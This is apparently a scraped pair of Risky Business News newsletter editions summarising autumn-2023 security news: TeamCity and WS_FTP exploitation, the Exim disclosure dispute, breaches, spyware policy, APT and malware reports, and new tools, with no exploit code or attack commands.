In both cases, exploitation began over the past weekend after proof-of-concept code was published online for both vulnerabilities. There are reports of attacks against TeamCity servers from Prodaft and attacks against WS_FTP servers from Huntress, Rapid7, and Kevin Beaumont.
Unlike previous vulnerabilities that impacted enterprise gear, these ones are in products that aren't so widely used—when compared to the likes of Citrix, Cisco, Fortinet, or VMWare products.
According to reports, there are roughly 1,200 TeamCity servers and from 550 to 4,300 WS_FTP servers connected to the internet.
Some security experts have said the numbers are too small to make threat actors care about the vulnerabilities since there are more abundant targets online that can be exploited; however, the recent attacks show the contrary.
The reality is that easy money is still easy money, especially for ransomware gangs after free exploits landed in their laps last week.
Breaches, hacks, and security incidents
ETSI hack: The European Telecommunications Standards Institute (ETSI) says hackers have stolen a database containing information on all users who registered on its website.
Lorenz leak: The website of the Lorenz ransomware gang has leaked every message ever sent through its contact form. Copies of all messages are available here.
Russian intelligence leak: Moscow officials have accidentally leaked the secret locations of Russian military and intelligence facilities. The data was part of a 434-page document that was available on the website of the Moscow City Hall. The document contained a list of all "special consumers" on the Russian electricity grid—locations that should never be disconnected from the grid and where a constant flow of electricity should be made available at all times. Most of the entries in this special group included critical infrastructure objectives, such as hospitals and train stations, but the document also exposed the exact locations of facilities maintained by the Russian military and Russian intelligence agencies. The leaked data has been used to create an interactive map that reporters argue could be useful for the Ukrainian Armed Forces in selecting future targets. [Additional coverage in the Dossier Center]
General tech and privacy
Mandatory MFA on AWS root: Amazon is making multi-factor authentication mandatory for all AWS accounts with root access to an organization's management console. The change will take effect in mid-2024. Amazon plans to expand the mandatory MFA requirement to other types of accounts throughout the next year.
GCP moves security features behind paywall: Google Cloud has moved the Policy Intelligence smart access control feature from the company's free tier to its paid Security Command Center subscription plan. The Policy Intelligence feature allows Google Cloud customers to analyze IAM policies and identify cloud resources that have extensive permissions. Google's move to restrict access to crucial security features comes after Microsoft gave customers free access to 31 cloud security log types earlier this year.
Mastodon yearly report: Mastodon has published its yearly activity report for 2022. The company reported €326,000 in donations, more than 9,600 active Mastodon servers, and 5.8 million registered users (at the end of 2022).
Google announces new Gmail anti-spam features: Google has introduced new anti-spam features for companies and individuals who send more than 5,000 emails to Gmail users each day. The company says that by February 2024, all bulk senders must authenticate their email servers using modern security standards and provide an easy way for users to unsubscribe from future emails. Google says it will keep an eye on spam thresholds and mark abusive bulk senders as spam if necessary.
Google alters search results for profit: Documents from Google's anti-trust case in the US have revealed that the company is altering billions of user search queries each day in order to return search results that contain more ads. [Additional coverage in Wired/non-paywall]
"Here's how it works. Say you search for "children's clothing." Google converts it, without your knowledge, to a search for 'NIKOLAI-brand kidswear,' making a behind-the-scenes substitution of your actual query with a different query that just happens to generate more money for the company, and will generate results you weren't searching for at all. It's not possible for you to opt out of the substitution. If you don't get the results you want, and you try to refine your query, you are wasting your time. This is a twisted shopping mall you can't escape."
Google lends a hand to Twitter: After destroying its own advertising business because its CEO can't stop promoting neo-nazi ideology, Twitter has decided to rent its near-zombie ad space to Google's Ads platform. More from tech and privacy activist LaurenWeinstein.
Government, politics, and policy
Japan to switch to domestic security software: The Japanese government will switch to using domestically-developed security software during fiscal year 2025. Officials say the move is part of an effort to improve the collection and analysis of telemetry and cyberattack data. Development of the new system is scheduled to finish by the end of March next year. The new system will be compatible with Windows systems and security software from Japanese companies. [Additional coverage in Nikkei]
GAO cybersecurity report: A GAO report found that federal agencies and critical infrastructure entities need to do a better job at sharing cyber threat intel information in order to effectively tackle ever-increasing complex cyber threats.
"Long-standing challenges, such as security concerns and timeliness, make this harder. For example, representatives from a nonfederal partner said the FBI briefed them on a cyber threat about 5 months after it was identified."
European Media Freedom Act: The European Parliament has proposed an updated version of the European Media Freedom Act that includes a ban on the use of spyware against journalists. The new document does not introduce a full blanket ban. Spyware may be used against journalists as a "last resort" and on a "case-by-case basis" under judicial authority to investigate serious crimes, such as terrorism or human trafficking.
FSB wants to track geolocation data: The Russian FSB intelligence service has put forward a draft law that will require all internet service providers to store the geolocation and payment information of their users. The draft law has been filed with the Russian Parliament. If approved, the law will apply to large internet companies active in Russia. These companies are already mandated by law to store all sorts of user data, which they have to make available to law enforcement investigations. [Additional coverage in Svoboda]
Formal VPN ban incoming: Russian communications watchdog Roskomnadzor plans to formally ban mobile VPN apps starting next year. The ban is scheduled to go into effect on March 1, 2024. After that date, mobile app stores like the Google Play Store and the Apple App Store will be forbidden from listing VPN apps to Russian users. [Additional coverage in RIA Novosti]
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Selena Larson, Senior Threat Intelligence Analyst at Proofpoint, about the state of play in the cybercrime ecosystem. People and organizations are getting better at protecting themselves from scams and compromises, but criminals will use every possible avenue to reach people and scam them.
Cybercrime and threat intel
Thai crypto scammers detained: Thai authorities have arrested five members of a cybercrime group that ran investment-romance fraud operations, commonly known as "pig butchering" scams. The suspects were detained last month, and officials seized $277 million worth of crypto-assets the gang stole from victims. Thai police were aided in their investigation by Binance's security team, which also helped dismantle a second smaller criminal group involved in crypto money laundering operations.
Thunderbird ransomware warning: The Mozilla Foundation is warning customers a ransomware gang is using its Thunderbird email app as a lure to deploy ransomware and encrypt networks.
Malicious npm packages: Fortinet has a report on a set of malicious JavaScript packages spotted on the official npm repository.
Supply chain report: Threat actors have published more than 245,000 malicious packages over the past calendar year, a figure twice as large as the two previous years combined. The number shows a clear and visible increase in attacks targeting the software supply chain, according to a recent report published by DevSecOps firm Sonatype. The same report also found that software rot is also highly active in the JavaScript and Java ecosystems, where 18.6% of open-source projects maintained in 2022 had been abandoned this year.
Umbreon interview: DataBreaches.net has a three-part interview with Dutch hacker Umbreon, known for operating as DataBox and selling hacked data on the old RAID and Breached forums. See parts one, two, and three.
Malware technical reports
Mystic Stealer: OALABS has published an analysis and IOCs for the Mystic infostealer, launched earlier this year in April.
Knight ransomware: CloudSek takes a look at the Knight ransomware, a rebranded version of the old Cyclops RaaS. Knight is one of the few RaaS platforms currently active today that offers Android and macOS versions besides the classic Windows, Linux, and ESXi—although if they work, it's another matter. Knight is written in Go.
Sponsor Demo Section
This is a new demo! Ryan Kalember shows Risky Business host Patrick Gray Proofpoint's Sigma platform. Sigma is a data loss prevention and insider threat detection tool that crunches data from different sources and presents a unified view of it.
APTs and cyber-espionage
APT41's Android malware: ThreatFabric has published an in-depth analysis of two Android malware strains used by the APT41 Chinese cyber-espionage group. They're named LightSpy and AndroidControl and are the DragonEgg and WyrmSpy strains first spotted by Lookout earlier this year.
REF5961: Elastic's security team has published a report on REF5961, a cyber-espionage group they found on the network of a Foreign Affairs Ministry from a member of the Association of Southeast Asian Nations (ASEAN). Elastic says it found the group's tools next to the malware of another cyber-espionage group it tracks as REF2924. REF5961's arsenal includes malware such as EAGERBEE, RUDEBIRD, and DOWNTOWN.
"Further, the correlation of execution flows, tooling, infrastructure, and victimology of multiple campaigns we're tracking along with numerous third-party reports makes us confident this is a China-nexus actor."
Konni: ThreatMon researchers have published a report on Konni, a North Korean APT group, and its recent campaign delivering malicious ISO files.
Cytrox infrastructure: French security firm Sekoia has identified domains and servers operated by spyware maker Cytrox (which they call Lycantrox). Servers appear to be located in Portugal, Angola, Kazakhstan, Indonesia, Egypt, Madagascar, and the Persian Gulf.
Vulnerabilities, security research, and bug bounty
Android patches two zero-days: The Android project has published security updates for the month of October to fix two actively exploited zero-days. The patches fix zero-days in the Libwebp library (CVE-2023-4863) and the Arm Mali GPU driver (CVE-2023-4211). The first is the same zero-day spotted by CitizenLab last month in attacks deploying the Pegasus spyware on Android and iPhone devices. Details about the second zero-day are not available, but Arm credited two Google security researchers for discovering the attacks.
Qualcomm exploitation: US chipmaker Qualcomm says threat actors are exploiting four vulnerabilities in its firmware in limited, targeted attacks. The attacks are targeting a bug patched in May 2022 (CVE-2022-22071) and three zero-days the company patched this week (CVE-2023-33106, CVE-2023-33107, and CVE-2023-33063). The attacks are targeting Adreno GPU and Compute DSP drivers. Qualcomm says it was notified of the ongoing exploitation by Google's Project Zero security team.
Recent zero-days in MSFT products:Microsoft says it reviewed its products and patched apps that are vulnerable to the recent Libwebp (CVE-2023-4863) and Libvpx (CVE-2023-5217) zero-days. Patches were made available to Edge, Teams, Skype, and various Microsoft Store extensions that support the WebP format.
Exim patches RCE bug: The Exim email server team has released patches for three of six zero-days disclosed last week by Trend Micro's ZDI project. Of the fixed zero-days, the most important vulnerability is a no-authentication remote code execution bug tracked as CVE-2023-42115. Although the vulnerability sounds bad, reports from the Exim team and watchTowr Labs say the bug is overhyped and hard to exploit.
"But in the meantime, don't panic - this one is more of a damp squib than a world-ending catastrophe."
Linux LPE: StarLabs researchers have published an analysis of CVE-2023-31248, an LPE vulnerability in the Linux kernel.
Looney Tunables: Qualys researchers have published an analysis of Looney Tunables (CVE-2023-4911), an LPE vulnerability in the GNU C Library. The bug impacts all versions released since April 2021 and primarily affects Linux distributions. Patches have been released this week.
OpenRefine vulnerability: SonarSource has discovered a ZIP slip vulnerability in OpenRefine, a Java tool for working and cleaning the format of complex and messy data.
"A Zip Slip vulnerability is caused by inadequate path validation when extracting archives, which may allow attackers to overwrite existing files or extract files to unintended locations."
ShellTorch vulnerabilities: Oligo Security has disclosed details on ShellTorch, three vulnerabilities impacting TorchServe, a server for running PyTorch machine learning processes. Of the three, the most severe is a remote code execution vulnerability (CVE-2023-43654) that allows unauthorized access to TorchServe management interfaces. Oligo says the RCE could be used to upload unauthorized data and alter ML models.
ConnectedIO router bugs: Claroty has identified several vulnerabilities in the firmware and cloud platform of ConnectedIO, a maker of 3G and 4G routers. The routers are typically used as components in IoT products to allow the devices to connect to the internet.
Infosec industry
Cybersecurity spending forecast: Research and consulting firm Gartner expects cybersecurity and risk management spending to reach $215 billion in 2024, 14.3% up from 2023. Gartner put out a positive forecast despite the recent decreases in cybersecurity investments and several rounds of layoffs across the infosec industry. The company attributes the rise in spending to the continuous adoption of cloud technologies and a large hybrid workforce.
New tool—cloudgrep: Cado Security has open-sourced cloudgrep, a tool for searching resources across S3 cloud storage servers.
"It currently supports searching log files, optionally compressed with gzip (.gz) or zip (.zip), in AWS S3."
New tool—KubeHound: DataDog's security team has open-sourced a tool named KubeHound that can be used to analyze Kubernetes clusters and create graphs of possible attack paths.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq examine how US and UK strategies to use cyber power differ but are in some ways mirror images of each other.
This newsletter is brought to you by Proofpoint. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
A critical vulnerability impacting more than 3.5 million Exim email servers has remained unpatched for more than 15 months in one of the most egregious instances of vulnerability disclosure snafus in recent history.
Tracked as CVE-2023-42115, the vulnerability is a no-authentication remote code execution with a severity rating of 9.8/10.
It is one of six vulnerabilities that were disclosed by Trend Micro's Zero-Day Initiative (ZDI) to the Exim project in June 2022.
While you'd think a bug like this would get the Exim team's immediate attention, things didn't pan out as expected.
After the six vulnerabilities were publicly disclosed last week, the Exim team blamed ZDI for the lack of a timely patch. In a mailing list discussion, the Exim team says they received the bug report in June 2022, but the report lacked the necessary details to identify the root cause of the bug and release a patch. When they asked for additional information, ZDI took 11 months to provide a reply, only in May 2023.
Exim project member Heiko Schlittermann says they have patches for three of the six ZDI bugs, but they are currently only available via a private repository.
In a different mailing list discussion, Exim member Florian Zumbiehl says they have "no idea whether [the patch] actually addresses what ZDI has reported," suggesting ZDI has yet to provide an accurate description for the bugs they reported 15 months ago.
It's hard to blame any of the parties here, but this doesn't make any less of a clusterf**k.
For starters, ZDI intermediates bug reports between anonymous researchers and software vendors, meaning it can only relay what information the researcher makes available to its staff. If the researcher—credited as "Anonymous" in the Exim bugs—doesn't respond for 11 months or doesn't provide the needed information, it is hardly ZDI's fault.
Second, as the mailing list discussion shows, it's also hard to blame the Exim team either. It's impossible to patch a no-auth RCE without the proper details needed to identify the vulnerable component.
Playing the blame game also diverts our focus from the real problem—the fact that more than 3.5 million Exim servers are now waiting for a patch that's unclear if it will work.
With Exim accounting for 56% of email servers, this leaves more than half of the internet's email infrastructure exposed to dangerous attacks if threat actors manage to identify the root cause of the bug.
Obviously, the chances of active exploitation are pretty slim. If neither ZDI nor Exim are sure the current (private) patch works, an attacker won't figure out an exploit either.
Once a patch is out, server owners will need to hurry and apply it as soon as possible, regardless of whether it works or not. Threat actors will most likely rush to bin-diff the Exim code, identify the patched component, and attempt to exploit the bug.
Exim servers have been a target for hackers every time a major vulnerability has been available. What makes them attractive is the sheer number of systems available for exploitation, which makes it easy to always keep a botnet fed with new bots every few days.
One of the most dangerous groups that has exploited Exim servers in the past includes Sandworm, a cyber-espionage unit inside Russia's military intelligence service. In May 2020, the NSA spotted Sandworm hacking Exim servers in order to build up its proxy infrastructure, which they'll likely attempt again if this new bug makes it possible.
Breaches, hacks, and security incidents
DarkBeam leak: Cyber risk management company DarkBeam has leaked more than 3.8 billion records after it left an Elasticsearch server unprotected on the internet. The database contained information from older breaches that DarkBeam was using to send alerts to customers. While the leaked data had already been public via separate smaller breaches, the DarkBeam leak has made it easier to download everything in one go. The company fixed the leaky servers as soon as it was notified. [Additional coverage in CyberNews]
General tech and privacy
Twitter fires election disinformation team: After disabling an election disinformation reporting tool, it appears that Elon Musk fired half of the election integrity team, even if he told EU officials he'd expand the team a month before. [Additional coverage in TechDirt]
BharOS leak: India's native operating system BharOS is just a badly disguised fork of GrapheneOS. The government research lab in charge of developing the operating system leaked its source code last week, which led to some interesting discussions among Indian experts.
Photoshop web versions: Adobe has released a web version of its Photoshop image editing software. Access is available to paid customers only.
Block Google's AI scrapers: Google now lets you use the robots.txt file to block its garbage and annoying AI scraping technology.
Stupid Apple iOS feature: The recently released iOS 17 operating system contains a new feature that will keep old passcodes alive for 72 hours after they've been changed. Apple says the feature is meant to allow users to re-access their iPhones in case they forget their new screen code. Security experts say the feature could allow threat actors to regain access to a device even if the account owner has changed an older passcode. Users can force older passcodes to expire immediately in the phone's "Face ID & Passcode" section—although this is not widely known by most iOS 17 users.
Government, politics, and policy
US AI Security Center: The US National Security Agency has announced the creation of an AI Security Center under the US DOD that will study and adopt AI technologies for national security and the defense industrial base. The new center will work with the intelligence community, the DOD, national research labs, and the US private sector, but also select foreign partners. The move comes after reports that China is exploring the use of AI for military weapons.
SBU infiltrated ransomware gangs: In an interview with NPR, Illia Vitiuk, Head of the Department of Cyber and Information Security of the Security Service of Ukraine (SBU), says the agency has had an influx of convicted cybercriminals who joined its ranks to help protect the country. Some of these volunteers have allegedly penetrated ransomware gangs, including "Russian ransomware groups working for special services."
Pegasus in Israel: Israeli officials have allowed local police to deploy the Pegasus spyware in a one-time case to investigate the murder of a Palestinian family. Officials have allowed police to use the spyware for surveillance but not to extract data from infected devices. [Additional coverage in the Times of Israel]
Greece spyware investigation: The Greek ruling government has sabotaged an independent commission meant to investigate the country's use of the Predator spyware. The Mitsotakis government replaced all members of the ADAE commission hours before they were set to meet and fine the EYP intelligence service for using spyware against civilian and political targets. The EYP was in line to receive a €100,000 fine. The move didn't go unnoticed and was criticized by the EU's PEGA commission, established to investigate spyware abuses across Europe. [Additional coverage in Reporter]
Sponsor section
In this sponsored podcast Proofpoint’s Selena Larson talks with Tom Uren about recent changes in the e-crime ecosystem.
Cybercrime and threat intel
French hacker pleads guilty: A member of the infamous ShinyHunters hacking group has pleaded guilty in a US court to hacking-related charges. Sebastien Raoult was one of three ShinyHunters hackers who breached companies all over the world and sold their data on underground forums. The 22-year-old Frenchman created phishing pages to compromise employee accounts, gain access to cloud resources, and then steal their data. US officials charged the trio in June 2021. Raoult was arrested in Morrocco last year and extradited to the US in January. Raoult used the hacker name of "Sezyo Kaizen." His two accomplices, Gabriel Bildstein (Gnostic Players, Kuroi) and Abdel-Hakim El-Ahmadi (Zac, Jordan Keso), are still at large.
Scammers detained in India: Indian authorities have dismantled a network of eight call centers in the city of Guwahati that conducted tech support scams. Authorities detained 250 workers, including three suspects believed to be the call centers' administrators. Officials say the three were part of an international gang with a presence all over India. Guwahati police say the call centers operated at night and used pop-up ads to trick people into calling for tech support. Callers were misled into installing malware on their systems and then tricked into making payments via bitcoin or gift vouchers. [Additional coverage in India Today]
New hacking forum: CyFirma security researcher Kaushík Pał has discovered a new hacking forum named SeekShell that launched earlier this year.
RaaS drama alert: The Donut Leaks ransomware gang is asking the INC Ransom group to not accept and publish any data from one of their past affiliates, who they describe as a scammer. Drama! We love it!
Malicious ads in Bing AI chat: Malwarebytes researchers have found malicious ads being injected and delivered via Bing Chat AI responses. AI is smart but not smart enough to spot malware, apparently.
Malware adopts smart contracts: A malware gang is storing parts of malicious JavaScript code inside smart contracts hosted on the Binance blockchain. The malicious code is used inside websites peddling fake browser updates that infect users with infostealers. According to FINSIN, the technique prevents security researchers from taking down the malicious code since it's not hosted on a web page but on an immutable blockchain.
New npm malware: Twenty-six malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
Reddit malware incident: A threat actor tried to bait users of the r/cybersecurity subreddit to download malware on their systems. The lure was a collection of leaked credentials, and the final payload was the WarZone RAT.
AWS honeypots: AWS's threat intel team says that it takes roughly three minutes for threat actors to discover new honeypots and attempt to compromise them.
"This is an astonishingly short amount of time, considering that these workloads aren't advertised or part of other visible systems that would be obvious to threat actors. This clearly demonstrates the voracity of scanning taking place and the high degree of automation that threat actors employ to find their next target."
Clop torrents investigation: Back in June, the Clop gang began releasing some of the data from the MOVEit hacks as torrent files after it began having problems with its hosting infrastructure. Researchers from Palo Alto Networks have analyzed the seeds of the Clop torrent files and found that most of the stolen MOVEit files have been released through three IP addresses belonging to Moscow-based web hosting provider FlyServers.
Phantom Hacker scams: The FBI is seeing an increase in a new scam targeting the elderly named Phantom Hacker. The scam relies on calling victims as bank representatives, telling users they've been hacked, and convincing them to move funds to a new account, typically under the scammer's control. The FBI says a recent variation of this scam involves three different scammers calling the victim, posing as representatives for banks, tech firms, and the government, in order to reinforce the need to move funds.
Malware technical reports
RustDeck malware: Dr.Web has identified several desktop remote-control Android apps that contain malware and are ranking high in search results on the Play Store. The apps are named AweSun Remote Desktop, RustDesk Remote Desktop, and AnyDesk Remote Desktop. Dr.Web says the apps are being used by threat actors to take control of Android devices and steal money from any installed e-payment apps.
BunnyLoader: A new MaaS service named BunnyLoader launched last month in underground malware forums.
GuLoader: French cybersecurity firm Intrinsec has a 31-page report on the GuLoader malware, the Italian company behind it, and its recent campaigns.
Sponsor Demo Section
Ryan Kalember shows Risky Business host Patrick Gray Proofpoint's Sigma platform. Sigma is a data loss prevention and insider threat detection tool that crunches data from different sources and presents a unified view of it.
APTs and cyber-espionage
Lazarus poses as Meta recruiter: North Korean cyberespionage group Lazarus has compromised the network of a Spanish aerospace company by tricking an employee into running malware on a work computer. Security firm ESET says the attack was successful after Lazarus members posed as recruiters for Facebook's parent company Meta and asked the victim to solve two trojanized coding challenges. The hack took place earlier this year and infected the company with a stealthy new backdoor named LightlessCan. ESET says the attack was part of a long-running Lazarus operation named DreamJob, where Lazarus members pose as recruiters on LinkedIn.
Oilrig: The Oilrig (APT34) Iranian cyber-espionage group has launched attacks against Saudi targets with malicious documents that delivered a new variant of the SideTwist backdoor named Menorah.
Chinese disinformation efforts: The US State Department has published a report detailing China's disinformation efforts, its techniques, and goals.
"The PRC promotes digital authoritarianism, which involves the use of digital infrastructure to repress freedom of expression, censor independent news, promote disinformation, and deny other human rights. Through disseminating technologies for surveillance and censorship, often through capabilities bundled under the umbrella of "smart" or "safe cities," the PRC has exported aspects of its domestic information environment globally. Beijing has also propagated information control tactics, with a particular focus on Africa, Asia, and Latin America. In parallel, the PRC has promoted authoritarian digital norms that other countries have adopted at a rapid pace. As other countries emulate the PRC, their information ecosystems have become more receptive to Beijing's propaganda, disinformation, and censorship requests."
Vulnerabilities, security research, and bug bounty
Vulnerability exploitation trends: Google's Mandiant division is seeing threat actors targeting a more diverse set of vendors and products than they did before. Mandiant says that over the past two years, Microsoft, Google, and Apple accounted for less than 50% of targeted vulnerabilities. This marked the first time products from the Big Three were targeted less than products from other vendors since Mandiant began tracking exploit attempts. The top other vendors included Apache, VMWare, Zoho, and SonicWall.
Progress WS_FTP security updates: The company behind the MOVEit file-sharing server has patched another set of critical vulnerabilities in another file-transfer application named the WS_FTP server. Eight bugs have received patches, including two with severity ratings of 10 (CVE-2023-40044) and 9.9 (CVE-2023-42657). Exploitation is trivial and requires one single HTTPS POST request. There are currently more than 550 WS_FTP servers connected to the internet, according to Shodan.
TeamCity exploitation: After a PoC was released last week, threat actors are now exploiting a vulnerability (CVE-2023-42793) in the JetBrains TeamCity CI/CD server to gain access to corporate repositories.
SharePoint PoC: A PoC was posted online for an RCE vulnerability in Microsoft SharePoint servers (CVE-2023-29357). The PoC comes after StarLabs researchers posted a detailed write-up of the bug last week.
"The exploit script facilitates the impersonation of authenticated users, allowing attackers to execute arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account, potentially causing a denial of service (DoS)."
Cloudflare bypass: Security firm Certitude has identified a weakness in Cloudflare's platform that allows threat actors to bypass security features. The weakness is that Cloudflare automatically trusts any traffic originating from its own platform. Certitude says threat actors can host attack infrastructure on the platform and successfully target other customers, bypassing firewalls, bot protections, and other security protections. The company reported the issues to Cloudflare, but the report was closed without a fix.
Infosec industry
IronNet shuts down: Cybersecurity firm IronNet has ceased all operations across all subsidiaries after the company ran out of funds. In an SEC filing, the company says it plans to file for Chapter 11 bankruptcy proceedings. The news comes after the company furloughed the vast majority of its workers at the start of September. [Additional coverage in SecurityWeek]
New tool—DavRelayUp: ShorSec has open-sourced a tool named DavRelayUp to perform NTLM+LDAP relay attacks.
Malware code: The source code of the Sub7 trojan (from the late 90s) has been released on GitHub.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq examine how US and UK strategies to use cyber power differ but are in some ways mirror images of each other.
Login
